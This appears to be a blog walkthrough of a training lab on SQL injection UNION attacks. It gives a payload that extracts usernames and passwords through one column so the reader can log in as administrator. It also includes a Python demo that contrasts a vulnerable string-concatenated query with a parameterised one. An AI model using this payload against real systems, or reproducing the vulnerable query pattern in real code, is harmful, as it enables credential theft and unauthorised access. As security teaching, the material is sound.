1.6 Lab: SQL injection UNION attack, retrieving multiple values in a single column | 2023


Karthikeyan Nagaraj
2 min read · Nov 25, 2023

Description

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.

The database contains a different table called users, with columns called username and password.

To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Solution

  1. Use the technique from the previous lab to find the number of columns returned by the original query.
  2. We found that there are 2 columns, so we have to test each column separately with a string value.
  3. Replace the NULL in the 1st column with any string; if that throws an error, move the string to the next NULL instead.
  4. Now we know that the second column is the one that holds string data.
  5. So, paste the query below to retrieve both values, joined with a ~ separator, through that single column: '+UNION+SELECT+NULL,username||'~'||password+FROM+users--
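To make clear why the step above works and what stops it, here is an added example that is not part of the original write-up or the lab itself. It builds a constructed in-memory SQLite database with a products table behind the category filter and the separate users table the lab describes, then runs the write-up's payload (URL-decoded) through two versions of the filter: one that concatenates the category into the SQL text, and one that binds it as a parameter. The table contents and passwords are invented sample values, and SQLite is used only because its || string-concatenation operator matches the behaviour the payload relies on (the same operator means string concatenation in Oracle and PostgreSQL, but not in MySQL, where it is a logical OR unless the server is configured otherwise).

```python
import sqlite3


def build_db():
    """Constructed schema mirroring the lab description (sample data, not the lab's)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (name TEXT, category TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Hat', 'Accessories'), ('Mug', 'Gifts');
        INSERT INTO users VALUES ('administrator', 'example-admin-pw'),
                                 ('wiener', 'example-user-pw');
        """
    )
    return conn


def products_vulnerable(conn, category):
    """Vulnerable filter: user input is spliced straight into the SQL text, so a
    quote in the input ends the string literal and the rest becomes SQL."""
    sql = "SELECT name, category FROM products WHERE category = '" + category + "'"
    return conn.execute(sql).fetchall()


def products_safe(conn, category):
    """Hardened filter: the SQL text is fixed and the value is bound as a
    parameter, so the input is only ever compared as data."""
    sql = "SELECT name, category FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


# The write-up's payload with the '+' URL encoding decoded to spaces.
LAB_PAYLOAD = "' UNION SELECT NULL,username||'~'||password FROM users--"


def leaked_credentials(conn):
    """Second-column values the vulnerable filter returns for the payload.
    The first column is NULL for every UNION row, which is how the extra
    rows can be told apart from real products."""
    rows = products_vulnerable(conn, LAB_PAYLOAD)
    return [row[1] for row in rows if row[0] is None]


def safe_result(conn):
    """The same payload against the parameterised filter: it is treated as a
    literal category name that matches nothing."""
    return products_safe(conn, LAB_PAYLOAD)


if __name__ == "__main__":
    db = build_db()
    print("vulnerable filter leaks:", sorted(leaked_credentials(db)))
    print("parameterised filter returns:", safe_result(db))
```

The fix is not to filter the word UNION or the quote character out of the input; it is to stop building SQL text from input at all. With a bound parameter the whole payload string is simply compared against the category column and no second SELECT ever exists.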

If you would like to support me so that I can create more free content — https://www.buymeacoffee.com/cyberw1ng

Thank you for Reading!

Happy Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng

Telegram Channel for Ethical Hacking Dumps — https://t.me/ethicalhackingessentials

Karthikeyan Nagaraj

Security Researcher | Bug Hunter | Web Pentester | CTF Player | TryHackme Top 1% | AI Researcher | Blockchain Developer